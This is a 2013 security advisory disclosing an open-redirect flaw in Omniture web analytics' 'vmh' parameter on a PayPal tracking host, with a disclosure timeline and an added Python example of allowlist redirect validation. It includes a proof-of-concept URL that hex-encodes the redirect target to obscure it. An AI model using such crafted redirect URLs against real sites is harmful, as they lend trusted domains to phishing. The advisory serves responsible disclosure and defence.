SSCHADV2013-003 - Omniture web analytics - Open Redirection vulnerability
Advisory: Omniture web analytics - Open Redirection vulnerability
Advisory ID: SSCHADV2013-003
Author: Stefan Schurtz
Affected Software: Successfully tested on paypal.112.2o7.net
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
The 'vmh' parameter in Omniture web analytics is prone to an open redirection vulnerability.
======================
PoC-Exploit
======================
// Redirection to darksecurity.de (Hex: %77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65)
http://paypal.112.2o7.net/b/ss/paypalglobal/1/H.24.2/s44689267192652?AQB=1&pccr=true&g=none&&vmh=%77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65&ndh=1&vmt=51437A79&ce=UTF-8&cc=USD&v5=DE&c6=9WG20829AV167542H&c7=premier&v7=premier:verified:unrestricted&c8=verified&c9=unrestricted&c10=de&v19=premier&c20=1360528993&c26=submit.x&&c35=in&c40=a0df0db936e73&c43=log%20in&c47=D=pageName&c50=de_de&&c54=100&c56=no&s=1440x900&c=24&j=1.7&v=Y&k=Y&bw=1440&bh=675&&pid=log%20in&pidt=1&oid=Einloggen&oidt=3&ot=SUBMIT&AQE=1
======================
Solution
======================
Fixed by vendor
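The advisory does not describe the vendor's fix. As an added example (not code from the advisory or from Adobe/Omniture), the following shows how a collection endpoint can validate a redirect host supplied in a query parameter such as 'vmh': decode exactly once, reduce the value to a hostname, and accept it only on an exact allowlist match. The allowlist and the fallback host are assumptions made for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed allowlist of redirect destinations (constructed for this example).
ALLOWED_REDIRECT_HOSTS = {"paypal.112.2o7.net"}

# A plain hostname: letters, digits, dots and hyphens only. Anything else
# ('/', '@', ':', '%', whitespace) means the value is not just a host.
_HOSTNAME_RE = re.compile(r"^[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?$")


def raw_query_param(query_string, name):
    """Return the still-encoded value of `name` from a query string, or None.

    The value is not decoded here so that normalise_host() decodes exactly
    once; decoding twice would let a double-encoded value slip past the check.
    """
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def normalise_host(raw_value):
    """Decode once and reduce a bare host or http(s) URL to a lowercase hostname.

    Returns None when the value is empty, uses another scheme, or is not a
    syntactically plain hostname. The PoC value %77%77%77%2E...%64%65 decodes
    to www.darksecurity.de, so comparing the encoded form would miss it.
    """
    if not raw_value:
        return None
    decoded = unquote(raw_value)
    if "://" in decoded:
        parts = urlsplit(decoded)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return None
        host = parts.hostname
    else:
        host = decoded
    host = host.rstrip(".").lower()
    return host if _HOSTNAME_RE.match(host) else None


def resolve_redirect_host(query_string, default_host):
    """Host to redirect to: the 'vmh' value if allowlisted, else default_host.

    Exact match only; suffix matching would accept lookalike hostnames.
    """
    host = normalise_host(raw_query_param(query_string, "vmh"))
    return host if host in ALLOWED_REDIRECT_HOSTS else default_host
```

With the PoC query string from this advisory, resolve_redirect_host() returns the default host instead of www.darksecurity.de.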
======================
Disclosure Timeline
======================
19-Feb-2013 – informed vendor by contact form
02-Mar-2013 – vendor informed by e-mail
04-Mar-2013 – feedback from vendor
04-Mar-2013 – sent detailed information to vendor
06-Mar-2013 – feedback from Adobe PSIRT (Adobe Product Security Incident Response Team)
29-Apr-2013 – asking about the current status
02-May-2013 – feedback from Adobe PSIRT (Adobe Product Security Incident Response Team)
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.omniture.com/de/privacy/2o7
http://www.darksecurity.de/advisories/2013/SSCHADV2013-003.txt